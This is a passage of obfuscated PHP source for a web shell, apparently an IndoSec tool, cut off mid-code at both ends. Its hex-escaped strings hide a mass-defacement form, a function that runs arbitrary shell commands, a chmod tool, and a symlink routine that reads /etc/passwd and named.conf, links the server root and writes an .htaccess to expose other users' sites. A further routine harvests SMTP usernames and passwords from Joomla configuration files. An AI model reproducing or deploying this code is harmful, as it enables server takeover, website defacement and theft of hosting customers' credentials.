file_put_contents($lokasi, $isi_script); } else { echo "\74\x70\76\x67\x61\x67\141\x6c\74\x2f\x70\x3e"; } } } } } } if ($_POST["\163\164\141\x72\x74"]) { echo "\133\40\74\x61\40\x68\162\x65\146\x3d\47\x3f\x64\x69\162\x3d{$dir}\x27\x3e\x4b\145\155\142\x61\x6c\151\x3c\57\141\x3e\x20\135\12\x9\11\x9\74\x74\x65\170\x74\141\162\145\x61\40\143\x6c\141\x73\x73\x3d\x27\x66\157\162\155\x2d\143\x6f\x6e\164\x72\x6f\x6c\x27\40\x72\x6f\x77\x73\75\x27\67\47\40\x64\151\x73\x61\x62\154\145\144\x3d\47\x27\x3e"; if ($_POST["\164\151\x70\145"] == "\x6d\x61\x68\141\154") { tipe_massal($_POST["\x64\137\x64\151\x72"], $_POST["\144\137\146\151\154\x65"], $_POST["\x73\143\162\151\160\x74"]); } elseif ($_POST["\164\151\160\x65"] == "\155\x75\162\x61\x68") { tipe_biasa($_POST["\x64\137\144\x69\x72"], $_POST["\x64\137\146\x69\x6c\x65"], $_POST["\163\x63\x72\151\160\x74"]); } echo "\74\x2f\x74\x65\170\164\141\x72\x65\141\x3e\x3c\142\162\x2f\x3e"; } else { echo "\74\x66\157\162\x6d\x20\x6d\145\164\x68\x6f\144\x3d\x27\160\157\163\x74\47\x3e\12\x9\11\11\x9\x3c\143\x65\x6e\164\145\x72\76\12\11\11\11\x9\11\x3c\150\x35\x3e\x54\151\x70\x65\40\x3a\74\x2f\x68\65\x3e\xa\x9\11\x9\11\11\74\x69\x6e\x70\x75\164\x20\x69\144\x3d\47\164\157\x67\x67\x6c\145\55\x6f\x6e\47\40\143\154\x61\163\163\x3d\x27\164\157\147\147\154\x65\x20\x74\x6f\147\147\154\x65\55\x6c\x65\146\x74\47\40\x6e\x61\x6d\145\75\47\x74\151\160\145\47\x20\x76\141\x6c\165\x65\75\47\x6d\x75\162\141\x68\47\40\164\x79\160\x65\75\x27\162\141\144\151\x6f\x27\40\143\x68\x65\x63\153\145\x64\x3e\12\x9\x9\x9\11\11\74\x6c\x61\142\145\x6c\40\146\157\162\x3d\47\x74\x6f\147\x67\154\x65\x2d\157\156\47\x20\143\x6c\x61\x73\x73\75\47\142\165\x74\x6e\x27\76\102\151\141\x73\x61\x3c\x2f\x6c\x61\142\145\x6c\76\xa\x9\x9\11\x9\11\74\151\x6e\x70\165\164\40\151\x64\75\x27\x74\157\x67\147\154\x65\55\x6f\146\x66\x27\x20\x63\154\141\x73\163\x3d\47\x74\157\147\x67\x6c\x65\x20\x74\157\147\x67\154\x65\55\x72\151\x67\150\164\47\x20\156\141\x6d\145\75\47\x74\x69\160\145\47\40\x76\141\x6c\x75\x65\x3d\x27\155\141\150\141\x6c\x27\40\164\171\160\x65\75\x27\x72\x61\x64\151\157\x27\x3e\12\x9\11\11\x9\x9\74\154\x61\142\x65\154\40\x66\157\162\x3d\47\x74\x6f\x67\x67\x6c\145\x2d\x6f\x66\146\47\x20\x63\x6c\141\x73\x73\75\47\x62\x75\x74\x6e\x27\76\115\x61\163\x61\154\74\x2f\154\141\x62\145\x6c\76\12\x9\11\11\11\x3c\57\x63\x65\156\x74\x65\x72\76\40\xa\11\11\x9\x9\x3c\150\x35\x3e\74\151\x20\143\154\x61\x73\x73\x3d\x27\x66\141\x20\x66\x61\x2d\146\x6f\x6c\x64\145\x72\x27\x3e\74\x2f\x69\x3e\x20\114\x6f\x6b\x61\163\151\x20\x3a\74\x2f\150\65\x3e\xa\11\11\11\x9\x3c\151\156\x70\165\x74\40\x74\171\160\x65\x3d\47\164\x65\170\164\x27\40\156\x61\x6d\x65\75\47\x64\x5f\144\151\162\47\x20\166\141\x6c\x75\145\75\47{$dir}\x27\40\x63\154\x61\x73\x73\75\47\x66\157\162\x6d\x2d\143\157\x6e\x74\162\157\x6c\47\x3e\74\142\x72\76\12\11\x9\x9\11\x3c\x68\x35\x3e\74\151\x20\143\154\141\163\163\x20\75\47\x66\x61\40\x66\x61\55\x66\151\x6c\x65\x27\x3e\74\x2f\151\x3e\x20\116\141\x6d\141\40\x46\151\x6c\x65\x20\x3a\74\x2f\150\65\x3e\xa\x9\11\x9\11\x3c\151\156\x70\x75\164\40\x74\171\x70\x65\75\47\164\x65\x78\164\47\40\156\x61\155\145\x3d\47\x64\137\x66\x69\x6c\x65\x27\x20\141\x75\164\157\x63\157\155\160\x6c\x65\x74\x65\x3d\47\x6f\146\146\x27\x20\x70\x6c\x61\143\145\x68\157\x6c\x64\x65\162\x3d\47\x5b\105\170\135\40\x69\156\x64\x65\170\x2e\x70\150\x70\x27\x20\143\x6c\x61\x73\x73\x3d\47\146\x6f\x72\155\55\143\157\x6e\164\x72\x6f\154\47\76\x3c\x62\x72\x2f\x3e\xa\11\x9\x9\x9\x3c\150\x35\x3e\74\x69\x20\x63\154\141\x73\163\x20\x3d\47\x66\141\40\x66\x61\x2d\x66\151\154\x65\x27\x3e\74\x2f\x69\76\x20\111\x73\151\40\x46\151\154\145\40\x3a\74\x2f\150\65\76\xa\11\x9\x9\x9\x3c\164\145\x78\164\141\162\145\141\x20\x6e\x61\155\x65\75\47\163\143\x72\151\160\164\x27\x20\x63\154\141\163\x73\x3d\47\146\157\162\x6d\x2d\143\157\156\164\x72\157\154\x27\x20\x72\x6f\167\163\x3d\47\x35\x27\40\x61\x75\x74\157\143\x6f\x6d\160\x6c\x65\164\x65\x3d\47\157\146\146\x27\x20\x70\154\x61\143\x65\150\157\x6c\144\145\162\x3d\47\x5b\x45\170\x5d\x20\x48\141\x63\153\145\144\40\102\171\40\x7b\x20\x49\156\144\157\x53\145\143\x20\x7d\47\76\74\57\x74\145\170\164\x61\x72\145\141\x3e\74\142\162\57\76\12\11\11\x9\11\x3c\151\156\x70\165\164\x20\164\x79\x70\145\x3d\x27\163\165\x62\x6d\x69\x74\47\40\156\141\155\145\x3d\47\163\164\x61\x72\164\x27\x20\166\x61\154\x75\145\75\x27\115\x61\x73\163\40\104\x65\146\x61\143\145\x27\x20\143\154\141\163\x73\75\x27\x62\x74\156\40\x62\164\156\55\x64\x61\x6e\147\x65\x72\40\x66\157\162\x6d\x2d\x63\157\156\x74\x72\x6f\x6c\x27\76\x3c\x62\162\57\76\xa\11\11\11\x3c\x2f\x66\x6f\x72\x6d\76"; } die; } goto fnGp0; xEaUB: $scdir = explode("\57", $dir); goto pbQJd; xQnAH: if ($_GET["\141\x6b\163\151"] == "\x63\x68\x6d\x6f\x64") { $nama = basename($_GET["\x66\151\x6c\x65"]); echo "\74\x66\x6f\x72\155\40\155\x65\164\150\157\144\x3d\47\120\117\x53\x54\47\x3e\xa\11\x9\11\x9\74\150\x35\76\103\x68\155\157\x64\x20\106\x69\x6c\145\40\x3a\x20{$nama}\x20\x3c\x2f\150\65\76\12\x9\11\11\11\x3c\x64\151\166\x20\x63\154\x61\163\x73\x3d\x27\146\157\x72\x6d\x2d\x67\x72\157\165\160\x20\x69\x6e\x70\x75\164\55\147\x72\x6f\x75\160\47\x3e\12\11\x9\11\11\11\74\x69\156\x70\x75\164\40\x74\171\x70\x65\75\x27\x74\x65\x78\164\47\x20\156\x61\x6d\145\x3d\47\160\x65\162\x6d\47\40\x63\154\x61\163\x73\x3d\x27\x66\x6f\x72\155\x2d\143\x6f\156\x74\x72\x6f\154\47\x20\166\141\154\165\145\x3d\x27" . substr(sprintf("\x25\x6f", fileperms($_GET["\x66\x69\x6c\x65"])), -4) . "\x27\x3e\xa\x9\11\x9\x9\11\74\x69\156\x70\x75\164\x20\x74\171\160\x65\x3d\x27\x73\165\142\x6d\151\x74\47\40\143\154\x61\163\x73\75\47\142\x74\156\x20\x62\164\156\55\144\x61\x6e\147\145\162\x20\146\x6f\162\x6d\55\x63\x6f\156\x74\162\157\x6c\x27\x20\x76\141\154\x75\145\x3d\47\103\x68\x6d\x6f\x64\x27\76\xa\11\11\x9\11\x3c\x2f\x64\151\x76\76\xa\x9\11\x9\x3c\57\x66\157\x72\155\76"; if (isset($_POST["\x70\145\162\155"])) { if (chmod($_GET["\x66\151\x6c\145"], $_POST["\x70\145\x72\x6d"])) { echo "\x3c\146\x6f\156\164\x20\143\157\x6c\x6f\162\75\42\x6c\x69\155\x65\x22\76\103\x68\141\156\147\x65\40\x50\145\162\155\x69\x73\163\151\157\156\40\x42\145\x72\150\x61\163\151\x6c\x3c\57\x66\157\x6e\x74\76\x3c\142\x72\57\x3e"; } else { echo "\x3c\x66\x6f\156\x74\40\x63\157\x6c\x6f\x72\x3d\x22\167\x68\x69\x74\x65\42\76\x43\150\141\x6e\147\x65\x20\120\145\x72\155\x69\163\x73\151\x6f\156\x20\x47\141\147\x61\154\74\x2f\146\157\x6e\x74\76\x3c\142\x72\57\x3e"; } } } goto JOAz0; ny8eb: @ini_set("\x6d\141\x78\137\x65\x78\145\x63\165\164\151\157\x6e\x5f\164\x69\x6d\x65", 0); goto XhlRY; VIISu: function exe($cmd) { if (function_exists("\x73\x79\x73\x74\145\x6d")) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif (function_exists("\145\170\x65\x63")) { @exec($cmd, $results); $buff = ''; foreach ($results as $result) { $buff .= $result; } return $buff; } elseif (function_exists("\160\x61\163\x73\164\150\162\x75")) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif (function_exists("\x73\150\145\x6c\x6c\x5f\x65\x78\x65\x63")) { $buff = @shell_exec($cmd); return $buff; } } goto PJRU9; O0b8k: if ($_GET["\x61\x6b\163\x69"] == "\x73\171\x6d\x6c\151\x6e\153") { $full = str_replace($_SERVER["\104\117\x43\x55\115\x45\116\124\x5f\122\x4f\117\124"], '', $path); $d0mains = @file("\x2f\x65\x74\143\x2f\x6e\141\x6d\145\144\x2e\143\157\x6e\x66"); if (!$d0mains) { die("\x5b\40\x3c\141\40\x68\162\145\x66\x3d\x27\77\x64\151\x72\x3d{$path}\46\141\153\x73\151\x3d\x73\171\155\162\x65\141\144\x27\76\102\x79\x70\141\x73\x73\40\x52\145\141\x64\74\57\x61\x3e\40\x5d\40\x5b\40\74\x61\x20\150\162\145\146\75\47\77\144\x69\x72\x3d{$path}\46\141\153\x73\151\x3d\x73\171\x6d\x5f\64\60\x34\x27\76\x53\x79\155\x6c\151\156\153\40\64\x30\64\x3c\x2f\141\76\40\135\40\133\40\x3c\141\40\x68\x72\145\146\x3d\47\77\x64\x69\162\75{$path}\46\x61\153\x73\x69\x3d\x73\171\x6d\x5f\x62\x79\x70\x61\163\x27\x3e\123\171\155\154\x69\x6e\153\x20\x42\x79\x70\141\x73\163\74\57\x61\x3e\x20\x5d\74\x62\162\x2f\76\x3c\x66\x6f\x6e\164\40\x63\157\154\x6f\x72\x3d\47\x72\x65\144\x27\76\x45\x72\x72\157\162\40\x74\151\x64\141\x6b\40\144\x61\x70\141\x74\x20\x6d\x65\155\142\141\143\x61\40\40\57\x65\164\143\x2f\x6e\141\x6d\x65\144\x2e\x63\157\x6e\146\x3c\57\146\157\156\x74\76\74\142\x72\x2f\76\74\142\162\x2f\x3e"); } if ($d0mains) { @mkdir("\151\156\x64\x73\x63\137\163\x79\x6d", 511); @chdir("\x69\x6e\x64\163\143\137\x73\x79\155"); @exe("\154\x6e\x20\55\x73\40\57\x20\x72\x6f\157\x74"); $file3 = "\117\160\x74\151\x6f\x6e\x73\40\111\x6e\144\x65\170\x65\x73\x20\106\157\154\154\157\x77\123\171\x6d\x4c\151\156\x6b\163\12\11\11\x9\104\x69\x72\145\143\164\x6f\x72\x79\111\156\144\145\x78\40\x69\156\x64\x73\x63\x2e\150\x74\x6d\154\12\11\11\11\101\144\x64\124\x79\x70\145\40\x74\x65\170\x74\57\x70\x6c\141\x69\156\40\56\x70\x68\160\xa\11\x9\x9\x41\144\144\x48\x61\156\144\x6c\x65\x72\x20\x74\145\170\x74\x2f\160\154\141\x69\x6e\x20\x2e\160\150\x70\xa\11\x9\x9\x53\141\x74\x69\163\146\x79\40\101\156\x79"; $fp3 = fopen("\x2e\150\164\141\143\143\145\x73\x73", "\167"); $fw3 = fwrite($fp3, $file3); @fclose($fp3); echo "\133\40\x3c\141\40\150\x72\145\x66\x3d\47\x3f\144\x69\162\x3d{$path}\x26\x61\153\163\x69\75\x73\x79\x6d\162\x65\x61\x64\x27\x3e\x42\x79\x70\141\x73\x73\x20\122\x65\141\x64\74\x2f\141\x3e\40\135\40\133\40\74\x61\40\150\x72\x65\x66\x3d\47\77\144\151\162\x3d{$path}\x26\x61\153\163\151\75\x73\x79\155\137\x34\60\64\x27\x3e\123\x79\155\x6c\151\x6e\x6b\x20\64\x30\64\x3c\x2f\x61\76\x20\135\40\x5b\x20\74\141\40\150\x72\x65\146\x3d\47\77\x64\151\x72\75{$path}\46\x61\153\x73\151\75\x73\171\155\x5f\142\171\160\141\163\47\76\123\x79\x6d\154\151\x6e\x6b\40\x42\171\160\x61\x73\163\x3c\57\x61\x3e\x20\x5d\12\11\x9\11\74\x64\151\x76\40\143\x6c\141\x73\x73\75\x27\164\x6d\160\x27\76\xa\x9\x9\x9\x3c\x74\x61\142\x6c\x65\x20\x63\154\141\163\163\x3d\47\x74\x65\x78\x74\55\143\x65\156\164\145\162\x20\164\x61\142\154\145\55\x72\145\x73\160\157\x6e\x73\151\166\145\47\x3e\xa\x9\11\x9\x9\74\x74\x68\145\x61\144\40\x63\154\x61\163\163\75\x27\x62\147\55\x69\x6e\146\157\x27\x3e\xa\11\11\11\x9\11\x3c\164\150\x3e\116\x6f\x2e\x3c\57\x74\150\76\12\11\11\11\11\x9\74\164\x68\76\x44\x6f\155\141\x69\156\x73\74\57\x74\x68\76\xa\11\x9\11\11\11\x3c\x74\150\76\125\x73\145\162\x73\74\x2f\164\150\x3e\xa\x9\11\11\x9\11\x3c\164\x68\76\163\x79\x6d\154\x69\x6e\153\40\x3c\57\x74\x68\x3e\xa\x9\x9\11\11\74\x2f\164\x68\x65\x61\x64\x3e"; $dcount = 1; foreach ($d0mains as $d0main) { if (eregi("\172\x6f\x6e\145", $d0main)) { preg_match_all("\43\x7a\157\x6e\x65\40\x22\50\56\x2a\51\x22\x23", $d0main, $domains); flush(); if (strlen(trim($domains[1][0])) > 2) { $user = posix_getpwuid(@fileowner("\57\145\x74\x63\57\x76\141\154\151\x61\163\145\163\x2f" . $domains[1][0])); echo "\x3c\164\x72\x3e\12\11\11\11\11\x9\x9\11\11\74\164\x64\x3e" . $dcount . "\x3c\57\164\144\76\12\x9\11\x9\x9\x9\x9\11\11\x3c\x74\144\40\143\x6c\x61\x73\163\75\x27\x74\x65\x78\x74\55\154\x65\x66\164\47\76\x3c\x61\x20\150\162\145\x66\x3d\x68\164\164\x70\x3a\x2f\x2f\167\167\167\x2e" . $domains[1][0] . "\57\76" . $domains[1][0] . "\74\57\141\x3e\x3c\57\x74\144\x3e\xa\x9\x9\x9\x9\x9\x9\11\11\x3c\164\144\76" . $user["\x6e\x61\x6d\x65"] . "\x3c\x2f\164\144\x3e\12\11\11\x9\11\11\x9\x9\11\x3c\x74\144\76\74\141\40\150\x72\x65\x66\x3d\x27{$full}\57\151\156\144\163\143\137\x73\x79\155\x2f\x72\157\x6f\x74\57\x68\x6f\155\x65\x2f" . $user["\156\x61\x6d\145"] . "\57\x70\x75\x62\x6c\151\x63\x5f\150\164\155\154\x27\x20\164\141\162\147\145\x74\75\x27\137\142\x6c\141\x6e\x6b\47\76\123\171\155\x6c\151\156\x6b\74\57\141\76\x3c\x2f\164\144\76\xa\x9\x9\x9\x9\x9\x9\11\74\x2f\164\x72\76"; flush(); $dcount++; } } } echo "\74\x2f\x74\x61\x62\x6c\x65\x3e\x3c\57\144\x69\166\x3e"; } else { $TEST = @file("\57\x65\x74\143\57\160\x61\163\163\167\144"); if ($TEST) { @mkdir("\151\x6e\144\x73\x63\x5f\163\x79\x6d", 511); @chdir("\x69\x6e\x64\x73\143\x5f\x73\x79\155"); @exe("\154\156\x20\x2d\x73\x20\x2f\x20\162\157\x6f\x74"); $file3 = "\117\160\164\151\x6f\x6e\x73\x20\111\x6e\x64\x65\x78\145\x73\x20\106\x6f\x6c\154\x6f\167\x53\x79\155\114\151\x6e\153\163\12\11\x9\11\11\104\x69\162\x65\143\x74\x6f\x72\171\x49\156\x64\x65\170\x20\x69\x6e\x64\163\x63\x2e\x68\x74\x6d\154\xa\x9\11\x9\x9\101\x64\x64\124\x79\x70\145\x20\x74\145\170\164\57\x70\x6c\141\x69\x6e\x20\x2e\x70\150\x70\xa\x9\x9\11\x9\x41\x64\144\110\x61\x6e\x64\154\x65\162\40\164\145\x78\x74\57\160\154\x61\x69\x6e\40\56\160\150\160\12\x9\11\11\11\x53\141\164\151\x73\x66\x79\40\101\156\x79"; $fp3 = fopen("\56\x68\164\141\x63\x63\145\x73\163", "\167"); $fw3 = fwrite($fp3, $file3); @fclose($fp3); echo "\133\x20\74\x61\40\150\162\x65\146\x3d\47\77\x64\151\162\x3d{$path}\x26\141\x6b\x73\151\75\x73\x79\155\x72\145\x61\x64\x27\x3e\x42\x79\x70\141\x73\x73\x20\122\x65\141\144\74\x2f\x61\x3e\x20\135\x20\x5b\x20\74\x61\x20\150\x72\145\146\75\47\x3f\144\151\162\75{$path}\46\x61\153\163\151\75\163\x79\155\x5f\64\x30\64\x27\76\x53\171\x6d\x6c\151\x6e\153\40\64\60\64\x3c\x2f\x61\76\x20\x5d\x20\x5b\40\x3c\141\40\x68\162\x65\x66\75\47\x3f\144\x69\162\75{$path}\x26\141\x6b\163\151\75\163\x79\155\x5f\142\x79\160\x61\x73\47\x3e\123\x79\x6d\x6c\x69\156\153\x20\x42\x79\x70\x61\163\163\x3c\x2f\x61\76\40\135\xa\x9\x9\x9\11\x3c\144\x69\x76\x20\x63\154\141\x73\163\x3d\x27\164\x6d\x70\x27\76\12\11\x9\x9\x9\74\x74\141\x62\x6c\145\40\143\154\141\x73\163\x3d\x27\164\145\x78\x74\55\x63\145\x6e\x74\x65\x72\x20\x74\x61\x62\x6c\145\x2d\162\x65\163\x70\x6f\x6e\163\x69\x76\145\x27\x3e\12\x9\x9\x9\11\x9\74\x74\x68\145\x61\144\40\143\154\141\163\163\75\x27\142\147\55\x77\141\x72\x6e\x69\156\x67\x27\76\xa\x9\x9\11\11\x9\11\74\164\150\x3e\x4e\157\x2e\x3c\57\x74\150\76\xa\11\11\11\x9\x9\x9\x3c\164\150\x3e\125\x73\145\162\163\74\57\x74\x68\76\12\x9\x9\x9\11\x9\x9\74\x74\x68\76\163\171\x6d\154\x69\x6e\153\40\74\57\x74\150\76\xa\x9\x9\x9\11\11\74\57\x74\150\145\141\144\x3e"; $dcount = 1; $file = fopen("\x2f\x65\x74\x63\57\x70\x61\163\x73\x77\x64", "\x72") or die("\125\156\x61\142\154\x65\x20\164\x6f\x20\x6f\160\x65\156\x20\146\151\x6c\145\x21"); while (!feof($file)) { $s = fgets($file); $matches = array(); $t = preg_match("\x2f\134\57\x28\56\x2a\x3f\x29\134\72\x5c\x2f\57\x73", $s, $matches); $matches = str_replace("\150\157\x6d\145\x2f", '', $matches[1]); if (strlen($matches) > 12 || strlen($matches) == 0 || $matches == "\142\151\x6e" || $matches == "\x65\164\x63\x2f\130\x31\x31\57\146\x73" || $matches == "\166\141\162\x2f\x6c\151\142\x2f\156\x66\163" || $matches == "\166\x61\x72\x2f\x61\162\x70\167\141\x74\x63\x68" || $matches == "\x76\x61\x72\57\147\157\160\x68\x65\162" || $matches == "\163\x62\151\156" || $matches == "\x76\x61\162\x2f\x61\x64\x6d" || $matches == "\165\163\x72\x2f\x67\141\x6d\x65\x73" || $matches == "\166\x61\162\57\146\x74\x70" || $matches == "\x65\164\x63\57\x6e\164\160" || $matches == "\x76\x61\162\57\x77\167\x77" || $matches == "\166\141\162\x2f\x6e\141\x6d\x65\144") { continue; } echo "\74\164\x72\76\xa\11\11\11\11\11\11\x9\x3c\164\x64\x3e" . $dcount . "\x3c\57\x74\144\76\xa\x9\11\11\x9\x9\11\x9\x3c\164\x64\76" . $matches . "\74\x2f\164\144\76\12\x9\11\x9\11\11\11\11\x3c\x74\x64\76\74\x61\40\x68\162\x65\x66\75{$full}\57\x69\x6e\x64\163\143\137\x73\171\x6d\57\162\157\x6f\164\x2f\150\157\x6d\x65\57" . $matches . "\x2f\x70\x75\142\x6c\151\143\137\150\164\x6d\154\40\164\141\x72\x67\x65\x74\75\47\137\x62\154\x61\156\153\x27\76\x53\171\155\154\x69\156\153\74\x2f\x61\76\74\x2f\x74\x64\76\12\x9\x9\11\x9\x9\11\x3c\x2f\x74\162\76"; $dcount++; } fclose($file); echo "\74\x2f\164\x61\x62\x6c\145\x3e\74\57\144\151\x76\76"; } else { if ($os != "\x57\151\156\x64\157\167\163") { @mkdir("\x69\x6e\x64\x73\143\x5f\x73\171\155", 511); @chdir("\151\156\x64\x73\143\137\163\x79\155"); @exe("\x6c\x6e\x20\55\163\x20\57\40\162\x6f\x6f\164"); $file3 = "\x4f\x70\164\151\x6f\x6e\x73\x20\x49\x6e\144\145\170\145\x73\40\x46\x6f\x6c\x6c\157\167\x53\171\x6d\x4c\x69\156\153\x73\12\x9\x9\x9\11\x44\x69\162\145\143\164\x6f\162\171\x49\x6e\x64\x65\x78\x20\151\156\x64\163\x63\56\x68\x74\x6d\x6c\xa\x9\11\11\x9\x41\x64\144\124\171\x70\145\x20\164\145\170\164\57\160\154\x61\x69\x6e\x20\56\x70\150\160\12\11\x9\11\11\x41\144\x64\x48\x61\x6e\x64\x6c\145\162\40\x74\x65\x78\x74\x2f\160\x6c\141\x69\156\x20\56\160\150\x70\12\11\11\11\11\123\x61\164\151\x73\146\x79\x20\101\156\171"; $fp3 = fopen("\x2e\150\x74\141\143\x63\145\163\163", "\167"); $fw3 = fwrite($fp3, $file3); @fclose($fp3); echo "\x5b\40\74\141\40\x68\162\x65\146\x3d\47\x3f\144\x69\162\75{$path}\x26\x61\x6b\x73\x69\75\x73\x79\155\162\x65\141\144\x27\76\x42\x79\x70\141\163\x73\40\x52\x65\141\144\74\57\x61\76\x20\x5d\40\133\40\74\141\x20\x68\x72\145\x66\75\47\77\144\151\x72\75{$path}\46\141\x6b\x73\x69\75\x73\171\x6d\137\64\60\x34\47\76\123\x79\x6d\x6c\x69\x6e\x6b\40\x34\x30\x34\74\x2f\141\x3e\x20\135\40\x5b\40\x3c\x61\40\150\162\x65\146\75\47\x3f\144\151\x72\75{$path}\46\x61\153\163\151\75\163\x79\x6d\x5f\x62\171\x70\x61\163\47\76\123\x79\x6d\154\151\156\153\40\x42\x79\160\x61\163\163\x3c\57\x61\x3e\40\x5d\xa\11\x9\11\x9\x3c\144\x69\x76\x20\143\154\141\x73\163\x3d\x27\164\x6d\x70\x27\76\xa\11\x9\11\x9\74\164\x61\142\x6c\145\x20\143\x6c\x61\163\163\75\47\x74\145\170\164\55\143\x65\x6e\164\145\162\40\164\x61\x62\154\145\55\162\145\163\160\157\x6e\163\x69\x76\145\x27\76\12\11\11\11\x9\x9\x3c\x74\150\145\141\144\x20\x63\154\x61\163\x73\75\x27\142\x67\55\144\141\x6e\x67\x65\162\x27\x3e\xa\x9\11\x9\11\x9\11\x3c\164\150\x3e\111\x44\56\x3c\57\164\x68\x3e\12\11\11\x9\x9\11\11\x3c\x74\150\76\x55\163\145\162\x73\x3c\x2f\x74\x68\x3e\xa\11\11\x9\11\x9\x9\74\164\x68\76\x73\171\155\154\x69\156\153\40\x3c\x2f\164\150\x3e\12\x9\x9\x9\11\11\74\x2f\x74\x68\145\x61\144\x3e"; $temp = ''; $val1 = 0; $val2 = 1000; for (; $val1 <= $val2; $val1++) { $uid = @posix_getpwuid($val1); if ($uid) { $temp .= join("\72", $uid) . "\xa"; } } echo "\74\x62\x72\57\76"; $temp = trim($temp); $file5 = fopen("\x74\145\163\x74\x2e\x74\170\x74", "\167"); fputs($file5, $temp); fclose($file5); $dcount = 1; $file = fopen("\164\x65\163\164\x2e\x74\170\164", "\x72") or die("\125\156\x61\x62\154\145\40\164\x6f\x20\x6f\x70\x65\x6e\x20\x66\151\154\145\41"); while (!feof($file)) { $s = fgets($file); $matches = array(); $t = preg_match("\x2f\x5c\x2f\x28\56\52\x3f\x29\x5c\x3a\x5c\x2f\57\163", $s, $matches); $matches = str_replace("\150\157\x6d\x65\57", '', $matches[1]); if (strlen($matches) > 12 || strlen($matches) == 0 || $matches == "\x62\x69\156" || $matches == "\x65\x74\x63\57\130\x31\x31\57\146\163" || $matches == "\x76\141\162\x2f\154\x69\x62\x2f\156\x66\x73" || $matches == "\x76\x61\x72\x2f\x61\x72\160\x77\141\164\x63\x68" || $matches == "\x76\141\x72\x2f\x67\157\160\150\x65\x72" || $matches == "\x73\x62\151\x6e" || $matches == "\166\x61\162\57\141\x64\155" || $matches == "\165\163\162\x2f\x67\141\155\x65\x73" || $matches == "\166\141\162\x2f\146\x74\x70" || $matches == "\145\164\143\x2f\x6e\164\160" || $matches == "\166\x61\x72\x2f\167\167\x77" || $matches == "\166\x61\162\x2f\156\141\x6d\x65\144") { continue; } echo "\74\x74\x72\76\12\11\x9\11\x9\x9\11\11\x3c\164\144\76" . $dcount . "\x3c\57\164\x64\76\xa\x9\x9\x9\11\11\11\11\74\164\144\76" . $matches . "\x3c\x2f\164\144\76\12\x9\x9\x9\11\x9\11\11\74\164\144\76\74\141\40\x68\x72\x65\146\75{$full}\x2f\151\156\x64\x73\x63\x5f\x73\x79\x6d\x2f\162\157\157\164\57\x68\157\155\x65\x2f" . $matches . "\x2f\160\165\x62\x6c\x69\143\137\150\164\155\154\x20\x74\141\x72\147\145\164\x3d\47\x5f\x62\154\141\156\x6b\x27\x3e\x53\171\155\154\151\x6e\153\74\x2f\x61\76\x3c\57\x74\144\76\xa\x9\11\11\11\x9\x9\74\x2f\164\x72\76"; $dcount++; } fclose($file); echo "\x3c\57\x74\x61\x62\154\x65\x3e\74\57\x64\151\166\76"; unlink("\164\145\x73\x74\56\x74\x78\164"); } } } die; } goto QpB05; PDFOO: if ($_GET["\x61\153\x73\151"] == "\x73\x6d\x74\160\147\162\141\x62") { function scj($path) { $paths = scandir($path); foreach ($paths as $pathb) { if (!is_file("{$path}\x2f{$pathb}")) { continue; } $ambil = file_get_contents("{$path}\x2f{$pathb}"); $ambil = str_replace("\x24", '', $ambil); if (preg_match("\57\x4a\103\157\156\146\151\147\x7c\152\x6f\157\x6d\x6c\141\57", $ambil)) { $smtp_host = ambilkata($ambil, "\x73\x6d\x74\160\150\157\163\x74\x20\x3d\40\47", "\47"); $smtp_auth = ambilkata($ambil, "\x73\x6d\x74\x70\141\165\164\150\x20\75\x20\47", "\47"); $smtp_user = ambilkata($ambil, "\x73\155\164\160\x75\x73\145\162\40\x3d\x20\47", "\x27"); $smtp_pass = ambilkata($ambil, "\x73\155\164\x70\x70\141\x73\x73\x20\x3d\x20\x27", "\47"); $smtp_port = ambilkata($ambil, "\163\155\x74\160\160\x6f\162\x74\40\75\x20\47", "\47"); $smtp_secure = ambilkata($ambil, "\x73\155\164\x70\x73\x65\143\x75\x72\145\40\x3d\x20\x27", "\x27"); echo "\74\164\x61\142\x6c\145\x20\x63\x6c\141\163\x73\75\x27\x74\x65\x78\x74\55\x77\150\151\164\145\40\x74\x61\142\x6c\145\40\x74\141\x62\154\145\x2d\x62\x6f\162\144\x65\x72\145\144\x27\x3e\12\x9\x9\11\x9\11\11\x3c\x74\x72\x3e\xa\11\x9\x9\11\x9\x9\x9\x3c\164\144\x3e\123\115\124\x50\x20\110\157\x73\164\72\x20{$smtp_host}\74\x2f\164\x64\x3e\xa\11\x9\11\x9\x9\x9\x3c\57\164\x72\x3e\xa\x9\11\11\11\11\x9\74\164\x72\x3e\xa\11\11\11\x9\11\x9\x9\74\x74\x64\76\x53\115\x54\x50\x20\120\x6f\162\164\72\40{$smtp_port}\74\57\x74\144\x3e\12\x9\11\11\11\x9\x9\x3c\x2f\164\162\76\12\x9\x9\x9\11\x9\11\x3c\x74\162\x3e\xa\11\x9\11\11\x9\x9\x9\74\164\144\x3e\123\115\124\120\40\x55\x73\x65\x72\x3a\40{$smtp_user}\x3c\x2f\x74\144\76\12\11\11\x9\11\11\11\74\x2f\164\x72\76\xa\11\x9\x9\x9\x9\x9\74\164\162\76\xa\x9\11\11\x9\11\11\11\74\164\144\76\x53\115\124\120\40\120\141\x73\x73\72\x20{$smtp_pass}\x3c\x2f\x74\144\x3e\12\x9\x9\11\x9\11\x9\74\x2f\164\x72\x3e\xa\11\x9\x9\11\11\x9\74\164\x72\76\12\x9\x9\x9\11\x9\x9\11\x3c\x74\x64\x3e\123\x4d\x54\x50\40\101\x75\x74\150\x3a\40{$smtp_auth}\x3c\57\x74\144\76\12\11\11\11\11\x9\x9\x3c\57\164\x72\76\xa\x9\11\11\x9\x9\x9\x3c\x74\162\x3e\12\11\11\11\11\11\x9\x9\74\164\144\76\x53\115\x54\x50\40\123\145\143\x75\162\x65\72\x20{$smtp_secure}\x3c\x2f\164\x64\x3e\12\x9\x9\11\x9\11\x9\74\57\x74\x72\x3e\12\x9\x9\11\x9\x9\74\x2f\x74\141\x62\154\x65\x3e"; } } } echo 